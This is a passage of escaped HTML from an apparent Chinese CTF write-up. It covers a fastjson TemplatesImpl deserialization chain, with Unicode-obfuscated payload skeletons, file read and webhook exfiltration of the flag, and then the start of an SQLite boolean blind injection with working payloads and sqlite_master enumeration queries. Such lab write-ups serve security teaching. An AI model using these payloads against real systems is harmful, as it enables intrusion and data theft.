\/flag.txt\n    \/app\/flag\n    \/tmp\/flag\n    \/home\/ctf\/flag\n    \/root\/flag<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u786e\u8ba4\u6709\u6548\u8def\u5f84\u4e3a: \/tmp\/flag<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u4e00\u6b65\uff0c\u6574\u4e2a\u94fe\u8def\u624d\u771f\u6b63\u4ece\u201c\u7406\u8bba\u80fd\u6253\u201d\u53d8\u6210\u201c\u8fdc\u7aef\u843d\u5730\u201d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e5d-\u5173\u952e-payload-\u7ed3\u6784\">\u4e5d\u3001\u5173\u952e payload \u7ed3\u6784<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4e86\u4e0d\u8ba9\u6574\u7bc7 WP \u88ab\u957f\u4e32 Base64 \u6df9\u6ca1\uff0c\u8fd9\u91cc\u53ea\u4fdd\u7559\u6700\u5173\u952e\u7684\u7ed3\u6784\u9aa8\u67b6\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-unicode-\u7ed5\u8fc7\u540e\u7684-templatesimpl\">1. 
Unicode \u7ed5\u8fc7\u540e\u7684 <code>TemplatesImpl<\/code><\/h5>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>{\n  \"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0078\\u0061\\u006c\\u0061\\u006e\\u002e\\u0069\\u006e\\u0074\\u0065\\u0072\\u006e\\u0061\\u006c\\u002e\\u0078\\u0073\\u006c\\u0074\\u0063\\u002e\\u0074\\u0072\\u0061\\u0078\\u002e\\u0054\\u0065\\u006d\\u0070\\u006c\\u0061\\u0074\\u0065\\u0073\\u0049\\u006d\\u0070\\u006c\",\n  \"_\\u0062\\u0079\\u0074\\u0065\\u0063\\u006f\\u0064\\u0065\\u0073\":&#91;\"&lt;base64 class bytes&gt;\"],\n  \"_\\u006e\\u0061\\u006d\\u0065\":\"p\"\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u91cd\u70b9\u4e0d\u662f\u90a3\u4e32\u5b57\u8282\u7801\u672c\u8eab\uff0c\u800c\u662f:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>@type<\/code> \u88ab Unicode \u5316<\/li>\n\n\n\n<li>\u5371\u9669\u7c7b\u540d\u88ab Unicode \u5316<\/li>\n\n\n\n<li>\u5173\u952e\u5b57\u6bb5\u540c\u6837\u505a\u4e86\u7ed5\u8fc7\u5904\u7406<\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-java-8-\u517c\u5bb9\u7248\u89e6\u53d1\u7ed3\u6784\">2. 
Java 8 \u517c\u5bb9\u7248\u89e6\u53d1\u7ed3\u6784<\/h5>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>{\n  \"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0078\\u0061\\u006c\\u0061\\u006e\\u002e\\u0069\\u006e\\u0074\\u0065\\u0072\\u006e\\u0061\\u006c\\u002e\\u0078\\u0073\\u006c\\u0074\\u0063\\u002e\\u0074\\u0072\\u0061\\u0078\\u002e\\u0054\\u0065\\u006d\\u0070\\u006c\\u0061\\u0074\\u0065\\u0073\\u0049\\u006d\\u0070\\u006c\",\n  \"_\\u0062\\u0079\\u0074\\u0065\\u0063\\u006f\\u0064\\u0065\\u0073\":&#91;\"&lt;java8 class bytes&gt;\"],\n  \"_\\u006e\\u0061\\u006d\\u0065\":\"p\",\n  \"_\\u0074\\u0066\\u0061\\u0063\\u0074\\u006f\\u0072\\u0079\":{\n    \"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0078\\u0061\\u006c\\u0061\\u006e\\u002e\\u0069\\u006e\\u0074\\u0065\\u0072\\u006e\\u0061\\u006c\\u002e\\u0078\\u0073\\u006c\\u0074\\u0063\\u002e\\u0074\\u0072\\u0061\\u0078\\u002e\\u0054\\u0072\\u0061\\u006e\\u0073\\u0066\\u006f\\u0072\\u006d\\u0065\\u0072\\u0046\\u0061\\u0063\\u0074\\u006f\\u0072\\u0079\\u0049\\u006d\\u0070\\u006c\"\n  },\n  \"_\\u006f\\u0075\\u0074\\u0070\\u0075\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0069\\u0065\\u0073\":{\n    \"\\u0040type\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0069\\u0065\\u0073\"\n  }\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u6bb5\u771f\u6b63\u4f53\u73b0\u7684\u662f\u5b8c\u6574\u601d\u8def:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e0d\u662f\u53ea\u628a\u5371\u9669\u7c7b\u653e\u8fdb\u53bb\u5c31\u7ed3\u675f<\/li>\n\n\n\n<li>\u8fd8\u8981\u547d\u4e2d\u6b63\u786e\u7684\u89e6\u53d1\u8def\u5f84<\/li>\n\n\n\n<li>\u66f4\u8981\u4fdd\u8bc1 payload \u4e0e\u8fdc\u7aef JDK 
\u7248\u672c\u517c\u5bb9<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341-\u6700\u7ec8\u5229\u7528\u94fe\">\u5341\u3001\u6700\u7ec8\u5229\u7528\u94fe<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u5b57\u8282\u7801\u7248\u672c\u4fee\u6b63\u4e4b\u540e\uff0c\u539f\u672c\u90a3\u4e9b\u201c\u53ea\u662f\u62a5\u9519\u201d\u7684\u8bf7\u6c42\u7ec8\u4e8e\u53d8\u6210\u4e86\u771f\u5b9e\u6267\u884c\u3002\u867d\u7136\u63a5\u53e3\u8868\u9762\u4ecd\u53ef\u80fd\u8fd4\u56de\u5f02\u5e38\uff0c\u4f46\u8fdc\u7aef JVM \u5df2\u7ecf\u5b8c\u6210\u4e86:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7c7b\u52a0\u8f7d<\/li>\n\n\n\n<li>\u89e6\u53d1\u6267\u884c<\/li>\n\n\n\n<li>\u8bfb\u53d6\u76ee\u6807\u6587\u4ef6<\/li>\n\n\n\n<li>\u5916\u5e26\u56de\u4f20 <\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>flowchart LR <code>A&#91;\"\u767b\u5f55\u5f52\u6863\u4e2d\u5fc3\"] --&gt; B&#91;\"\u89c2\u5bdf rememberMe \u4e0e\u4f1a\u8bdd\u8bed\u4e49\"] B --&gt; C&#91;\"\u5b9a\u4f4d \/api\/integration\/preview\"] C --&gt; D&#91;\"\u8bc6\u522b fastjson-compat \u89e3\u6790\"] D --&gt; E&#91;\"Unicode \u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a\"] E --&gt; F&#91;\"\u5b9e\u4f8b\u5316 TemplatesImpl\"] F --&gt; G&#91;\"\u547d\u4e2d\u6a21\u677f\u89e6\u53d1\u8def\u5f84\"] G --&gt; H&#91;\"\u66ff\u6362\u4e3a Java 8 \u517c\u5bb9\u6076\u610f translet\"] H --&gt; I&#91;\"\u8bfb\u53d6 \/tmp\/flag\"] I --&gt; J&#91;\"\u901a\u8fc7 webhook \u56de\u4f20\u7ed3\u679c\"]<\/code><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u771f\u6b63\u51b3\u5b9a\u6210\u8d25\u7684\uff0c\u4e0d\u662f\u67d0\u4e00\u4e2a\u5b64\u7acb\u6280\u5de7\uff0c\u800c\u662f\u4e09\u4ef6\u4e8b\u540c\u65f6\u6210\u7acb:<\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>\u4f60\u770b\u61c2\u4e86\u9898\u9762\u7ed9\u51fa\u7684\u4e24\u6761\u7ebf\u7d22<\/li>\n\n\n\n<li>\u4f60\u627e\u5230\u4e86\u771f\u6b63\u7684\u517c\u5bb9\u89e3\u6790\u5165\u53e3<\/li>\n\n\n\n<li>\u4f60\u5c0a\u91cd\u4e86\u8fdc\u7aef\u8fd0\u884c\u65f6\u73af\u5883<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u4e00-\u7ed3\u679c\u786e\u8ba4\">\u5341\u4e00\u3001\u7ed3\u679c\u786e\u8ba4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Webhook \u6536\u5230\u7684\u6700\u7ec8\u56de\u4f20\u4e3a: \/tmp\/flag:FLAG{71b70868-77e0-4efa-ab98-b8f9133d53f5}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u672c\u9898\u6700\u7ec8 flag \u662f: FLAG{71b70868-77e0-4efa-ab98-b8f9133d53f5}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u4e8c-\u8fd9\u9898\u5230\u5e95\u5728\u8003\u4ec0\u4e48\">\u5341\u4e8c\u3001\u8fd9\u9898\u5230\u5e95\u5728\u8003\u4ec0\u4e48<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u628a\u8fd9\u9898\u603b\u7ed3\u6210\u201cFastjson \u53cd\u5e8f\u5217\u5316\u201d\uff0c\u5176\u5b9e\u662f\u4f4e\u4f30\u4e86\u5b83\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u66f4\u50cf\u662f\u5728\u8003\u56db\u5c42\u80fd\u529b:<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u5bf9\u9898\u9762\u53d9\u4e8b\u7684\u5224\u65ad\u529b\">1. 
\u5bf9\u9898\u9762\u53d9\u4e8b\u7684\u5224\u65ad\u529b<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\"><code>rememberMe<\/code> \u4e0d\u662f\u65e0\u610f\u4e49\u88c5\u9970\uff0c<code>legacy parser<\/code> \u4e5f\u4e0d\u662f\u65e0\u610f\u4e49\u70b9\u7f00\u3002\u9898\u76ee\u628a\u4e24\u6761\u7ebf\u7d22\u90fd\u653e\u5230\u4e86\u660e\u9762\u4e0a\uff0c\u4f46\u771f\u6b63\u7684\u7a81\u7834\u5e76\u4e0d\u5728\u7b2c\u4e00\u773c\u6700\u5bb9\u6613\u4e0a\u5934\u7684\u5730\u65b9\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-\u5bf9-java-\u517c\u5bb9\u5c42\u98ce\u9669\u7684\u654f\u611f\">2. \u5bf9 Java \u517c\u5bb9\u5c42\u98ce\u9669\u7684\u654f\u611f<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u8c13\u201ccompat\u201d\uff0c\u5f88\u591a\u65f6\u5019\u5c31\u662f\u5386\u53f2\u503a\u6700\u6d53\u7684\u5730\u65b9\u3002\u4e00\u65e6\u8001\u89e3\u6790\u5668\u8fd8\u5728\u670d\u5f79\uff0c\u653b\u51fb\u9762\u5f80\u5f80\u4e0d\u662f\u7f29\u6c34\uff0c\u800c\u662f\u88ab\u6084\u6084\u4fdd\u7559\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-\u5bf9\u5229\u7528\u94fe\u72b6\u6001\u7684\u8fa8\u8bc6\u80fd\u529b\">3. \u5bf9\u5229\u7528\u94fe\u72b6\u6001\u7684\u8fa8\u8bc6\u80fd\u529b<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0d\u662f\u770b\u5230 <code>JSONException<\/code> \u5c31\u8bf4\u660e\u5931\u8d25\uff0c\u4e5f\u4e0d\u662f\u770b\u5230 <code>TemplatesImpl<\/code> \u5b9e\u4f8b\u5316\u5c31\u8bf4\u660e\u6210\u529f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f60\u5f97\u5206\u6e05:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u54ea\u4e00\u6b65\u53ea\u662f\u8fdb\u5165\u4e86\u89e3\u6790\u9636\u6bb5<\/li>\n\n\n\n<li>\u54ea\u4e00\u6b65\u771f\u7684\u5b8c\u6210\u4e86\u7c7b\u52a0\u8f7d<\/li>\n\n\n\n<li>\u54ea\u4e00\u6b65\u624d\u662f\u6700\u7ec8\u7684\u4ee3\u7801\u6267\u884c<\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"4-\u5bf9\u8fd0\u884c\u73af\u5883\u7ec6\u8282\u7684\u656c\u754f\">4. 
\u5bf9\u8fd0\u884c\u73af\u5883\u7ec6\u8282\u7684\u656c\u754f<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u6709\u5473\u9053\u7684\u4e00\u70b9\uff0c\u5c31\u662f\u8ba9\u4eba\u91cd\u65b0\u610f\u8bc6\u5230:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6f0f\u6d1e\u5229\u7528\u4ece\u6765\u4e0d\u662f\u53ea\u548c\u8bed\u6cd5\u5bf9\u8bdd\uff0c\u5b83\u4e5f\u5728\u548c\u7248\u672c\u3001\u7c7b\u52a0\u8f7d\u5668\u3001\u8fd0\u884c\u65f6\u73b0\u5b9e\u5bf9\u8bdd\u3002<\/p>\n<\/blockquote>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u4e09-\u590d\u73b0\u6458\u8981\">\u5341\u4e09\u3001\u590d\u73b0\u6458\u8981<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u4fdd\u7559\u6700\u6838\u5fc3\u7684\u590d\u73b0\u6b65\u9aa4\uff0c\u53ef\u4ee5\u538b\u7f29\u6210:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4f7f\u7528 <code>guest \/ guest2026<\/code> \u767b\u5f55\u5f52\u6863\u4e2d\u5fc3<\/li>\n\n\n\n<li>\u89c2\u5bdf <code>rememberMe<\/code> \u4e0e <code>\/api\/session<\/code> \u7684 remembered \u8bed\u4e49<\/li>\n\n\n\n<li>\u4ece\u524d\u7aef JS \u5b9a\u4f4d\u5230 <code>\/api\/integration\/preview<\/code><\/li>\n\n\n\n<li>\u4ece\u54cd\u5e94\u4e2d\u7684 <code>fastjson-compat<\/code> \u786e\u8ba4\u517c\u5bb9\u89e3\u6790\u65b9\u5411<\/li>\n\n\n\n<li>\u7528 Unicode \u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a<\/li>\n\n\n\n<li>\u6210\u529f\u5b9e\u4f8b\u5316 <code>TemplatesImpl<\/code><\/li>\n\n\n\n<li>\u53d1\u73b0\u8fdc\u7aef\u662f <code>Java\/1.8.0_482<\/code><\/li>\n\n\n\n<li>\u5c06\u6076\u610f translet \u91cd\u65b0\u7f16\u8bd1\u4e3a Java 8 \u5b57\u8282\u7801<\/li>\n\n\n\n<li>\u518d\u6b21\u89e6\u53d1\u6a21\u677f\u94fe<\/li>\n\n\n\n<li>\u4ece <code>\/tmp\/flag<\/code> \u8bfb\u53d6\u76ee\u6807\u5185\u5bb9\u5e76\u5916\u5e26\u56de\u4f20<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator 
has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u56db-\u7ed3\u8bed\">\u5341\u56db\u3001\u7ed3\u8bed<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u9898\u540d\u53eb <strong>\u8bb0\u4f4f\u6211\uff0c\u4e5f\u8bb0\u4f4f\u5377\u5b97<\/strong>\uff0c\u5176\u5b9e\u53d6\u5f97\u5f88\u5999\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u201c\u8bb0\u4f4f\u6211\u201d\u662f\u8868\u5c42\u7ebf\u7d22\uff0c\u5b83\u628a\u4f60\u5f15\u5230\u8ba4\u8bc1\u3001\u4f1a\u8bdd\u3001\u957f\u671f\u72b6\u6001\uff1b\u201c\u8bb0\u4f4f\u5377\u5b97\u201d\u662f\u66f4\u6df1\u7684\u4e00\u5c42\uff0c\u5b83\u63d0\u9192\u4f60\u53bb\u770b\u90a3\u4e9b\u88ab\u7cfb\u7edf\u957f\u671f\u4fdd\u7559\u4e0b\u6765\u7684\u5f52\u6863\u903b\u8f91\u3001\u65e7\u6a21\u677f\u903b\u8f91\u3001\u517c\u5bb9\u89e3\u6790\u903b\u8f91\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u5371\u9669\u7684\uff0c\u4ece\u6765\u4e0d\u53ea\u662f\u4e00\u4e2a\u767b\u5f55\u6846\u6216\u4e00\u4e2a Cookie\u3002\u771f\u6b63\u5371\u9669\u7684\uff0c\u662f\u4e00\u4e2a\u7cfb\u7edf\u5728\u957f\u671f\u6f14\u8fdb\u4e2d\u7559\u4e0b\u7684\u90a3\u4e9b\u201c\u5148\u522b\u5220\uff0c\u8fd8\u5f97\u517c\u5bb9\u201d\u7684\u89d2\u843d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u8fd9\u9053\u9898\u6700\u6f02\u4eae\u7684\u5730\u65b9\uff0c\u5c31\u5728\u4e8e\u5b83\u628a\u8fd9\u79cd\u5de5\u7a0b\u73b0\u5b9e\uff0c\u5b8c\u6574\u5730\u7ffb\u8bd1\u6210\u4e86\u4e00\u6761\u53ef\u4ee5\u771f\u6b63\u6253\u901a\u7684\u5229\u7528\u94fe\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"flag\">Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{71b70868-77e0-4efa-ab98-b8f9133d53f5}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u9080\u8bf7\u7801\u8bf4\u5b83\u77e5\u9053\">\u9080\u8bf7\u7801\u8bf4\u5b83\u77e5\u9053<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p 
class=\"wp-block-paragraph\">\u9080\u8bf7\u7801\u4e0d\u4f1a\u8bf4\u8bdd\uff0c\u4f46\u5b83\u4f1a\u70b9\u5934\u548c\u6447\u5934\u3002\u4f60\u95ee\u7684\u95ee\u9898\u591f\u5de7\uff0c\u5b83\u5c31\u4f1a\u6162\u6162\u628a\u79d8\u5bc6\u201c\u55ef\u55ef\u554a\u554a\u201d\u51fa\u6765\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u91cd\u70b9\u67e5\u770b\u524d\u7aef JS \u8c03\u7528\u7684 <code>\/api\/invite\/check?code=<\/code> \u63a5\u53e3\uff0c\u8fd9\u4e2a\u63a5\u53e3\u5b58\u5728 SQLite \u5e03\u5c14\u76f2\u6ce8\uff1b\u901a\u8fc7\u6784\u9020\u771f\u5047\u6761\u4ef6\u89c2\u5bdf <code>valid=true\/false<\/code> \u7684\u53d8\u5316\uff0c\u4ece <code>sqlite_master<\/code> \u679a\u4e3e\u8868\u7ed3\u6784\uff0c\u518d\u5229\u7528 <code>substr()<\/code>\u3001<code>length()<\/code> \u9010\u5b57\u7b26\u7206\u7834\u6570\u636e\u5e93\u4e2d\u7684 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e00-\u9898\u76ee\u521d\u89c1\">\u4e00\u3001\u9898\u76ee\u521d\u89c1<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6253\u5f00\u9898\u76ee\u9996\u9875\uff0c\u9875\u9762\u672c\u8eab\u76f8\u5f53\u514b\u5236\uff0c\u529f\u80fd\u4e5f\u5f88\u5355\u4e00\uff1a\u8f93\u5165\u4e00\u4e2a\u9080\u8bf7\u7801\uff0c\u70b9\u51fb\u6821\u9a8c\uff0c\u524d\u7aef\u4f1a\u544a\u8bc9\u6211\u4eec\u9080\u8bf7\u7801\u662f\u5426\u6709\u6548\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9875\u9762\u7684\u4ef7\u503c\u901a\u5e38\u4e0d\u5728 UI\uff0c\u800c\u5728\u5b83\u80cc\u540e\u7684\u63a5\u53e3\u8c03\u7528\u903b\u8f91\u3002\u56e0\u6b64\u7b2c\u4e00\u6b65\u4e0d\u662f\u76f2\u8bd5\u8f93\u5165\uff0c\u800c\u662f\u67e5\u770b\u524d\u7aef JavaScript\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u7aef\u6838\u5fc3\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    form.addEventListener(\"submit\", async (event) =&gt; {\n      event.preventDefault();\n      result.textContent = \"Checking invite...\";\n      result.className = 
\"result\";\n\n      const params = new URLSearchParams({ code: code.value });\n      const response = await fetch(`\/api\/invite\/check?${params.toString()}`);\n      const data = await response.json();\n\n      result.textContent = data.message;\n      result.classList.add(data.valid ? \"ok\" : \"no\");\n    });<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u51fa\uff0c\u7528\u6237\u8f93\u5165\u6700\u7ec8\u4f1a\u8fdb\u5165\uff1a<code>\/api\/invite\/check?code=<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a5\u53e3\u54cd\u5e94\u7c7b\u4f3c\uff1a<code>{\"message\":\"Invite code was not found.\",\"valid\":false}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u6700\u5173\u952e\u7684\u662f\uff1a<strong>\u8fd4\u56de\u503c\u91cc\u5b58\u5728\u53ef\u89c2\u6d4b\u7684\u5e03\u5c14\u91cf <code>valid<\/code><\/strong>\u3002\u8fd9\u610f\u5473\u7740\u5982\u679c\u53c2\u6570\u62fc\u63a5\u8fdb SQL \u8bed\u53e5\u4e2d\uff0c\u6211\u4eec\u5c31\u6709\u673a\u4f1a\u628a\u5b83\u53d8\u6210\u4e00\u4e2a\u201c\u771f\u5047\u5224\u65ad\u5668\u201d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e8c-\u6f0f\u6d1e\u5b9a\u4f4d\">\u4e8c\u3001\u6f0f\u6d1e\u5b9a\u4f4d<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6839\u636e\u9898\u5e72\u63d0\u793a\uff0c\u672c\u9898\u5b58\u5728 <strong>SQLite \u5e03\u5c14\u76f2\u6ce8<\/strong>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u8bf4\uff0c\u540e\u7aef\u5927\u6982\u7387\u5b58\u5728\u7c7b\u4f3c\u8fd9\u6837\u7684\u67e5\u8be2\u903b\u8f91\uff1a SELECT * FROM partner_invites WHERE code = &#8216;&lt;\u7528\u6237\u8f93\u5165&gt;&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u8f93\u5165\u672a\u7ecf\u5b89\u5168\u5904\u7406\uff0c\u90a3\u4e48\u6211\u4eec\u5c31\u80fd\u95ed\u5408\u539f\u6709\u5b57\u7b26\u4e32\uff0c\u5e76\u989d\u5916\u62fc\u63a5\u5e03\u5c14\u8868\u8fbe\u5f0f\u3002<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\"><strong>\u9a8c\u8bc1\u601d\u8def<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5206\u522b\u6784\u9020\u6052\u771f\u548c\u6052\u5047\u7684 payload\uff1a &#8216; OR 1=1&#8211; &#8216; OR 1=2&#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6d4b\u8bd5\u7ed3\u679c\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>code=' OR 1=1--<\/code> \u65f6\uff0c\u63a5\u53e3\u8fd4\u56de <code>valid=true<\/code><\/li>\n\n\n\n<li><code>code=' OR 1=2--<\/code> \u65f6\uff0c\u63a5\u53e3\u8fd4\u56de <code>valid=false<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u5df2\u7ecf\u8db3\u591f\u786e\u8ba4\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u8f93\u5165\u88ab\u62fc\u63a5\u8fdb\u4e86 SQL<\/li>\n\n\n\n<li>\u6ce8\u91ca\u7b26 <code>--<\/code> \u751f\u6548<\/li>\n\n\n\n<li>\u6211\u4eec\u53ef\u4ee5\u7a33\u5b9a\u5229\u7528 <code>valid<\/code> \u7684\u771f\u5047\u56de\u663e\u505a\u5e03\u5c14\u76f2\u6ce8<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e09-\u4e3a\u4ec0\u4e48\u662f-sqlite\">\u4e09\u3001\u4e3a\u4ec0\u4e48\u662f SQLite<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u5e72\u5df2\u7ecf\u70b9\u660e\u662f SQLite\uff0c\u4f46\u4ece\u5229\u7528\u5c42\u9762\u770b\uff0cSQLite \u4e5f\u6709\u975e\u5e38\u9c9c\u660e\u7684\u7279\u5f81\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53ef\u4ee5\u901a\u8fc7 <code>sqlite_master<\/code> \u679a\u4e3e\u8868\u7ed3\u6784<\/li>\n\n\n\n<li>\u652f\u6301 <code>length()<\/code>\u3001<code>substr()<\/code>\u3001<code>unicode()<\/code> \u7b49\u51fd\u6570<\/li>\n\n\n\n<li>\u53ef\u5229\u7528 <code>pragma_table_info('table_name')<\/code> \u67e5\u770b\u5217\u4fe1\u606f<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u6574\u9053\u9898\u7684\u8def\u7ebf\u975e\u5e38\u6e05\u6670\uff1a<\/p>\n\n\n\n<ol 
class=\"wp-block-list\">\n<li>\u7528\u771f\u5047\u56de\u663e\u786e\u8ba4\u76f2\u6ce8\u6210\u7acb<\/li>\n\n\n\n<li>\u4ece <code>sqlite_master<\/code> \u679a\u4e3e\u8868\u540d<\/li>\n\n\n\n<li>\u5b9a\u4f4d\u53ef\u7591\u8868<\/li>\n\n\n\n<li>\u679a\u4e3e\u5b57\u6bb5<\/li>\n\n\n\n<li>\u7206\u51fa flag<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u56db-\u76f2\u6ce8\u5229\u7528\u94fe\">\u56db\u3001\u76f2\u6ce8\u5229\u7528\u94fe<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u679a\u4e3e\u8868\u6570\u91cf\">1. \u679a\u4e3e\u8868\u6570\u91cf<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e03\u5c14\u76f2\u6ce8\u7684\u57fa\u672c\u5f62\u5f0f\uff1a &#8216; OR ()&#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5982\u5224\u65ad\u8868\u6570\u91cf\u662f\u5426\u5927\u4e8e\u67d0\u4e2a\u503c\uff1a &#8216; OR ((select count(*) from sqlite_master where type=&#8217;table&#8217;) &gt; 3)&#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u914d\u5408\u4e8c\u5206\u6cd5\uff0c\u53ef\u4ee5\u5feb\u901f\u5f97\u5230\u6570\u636e\u5e93\u4e2d\u8868\u7684\u6570\u91cf\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u679a\u4e3e\u7ed3\u679c\u4e3a\uff1a 5<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-\u679a\u4e3e\u8868\u540d\">2. 
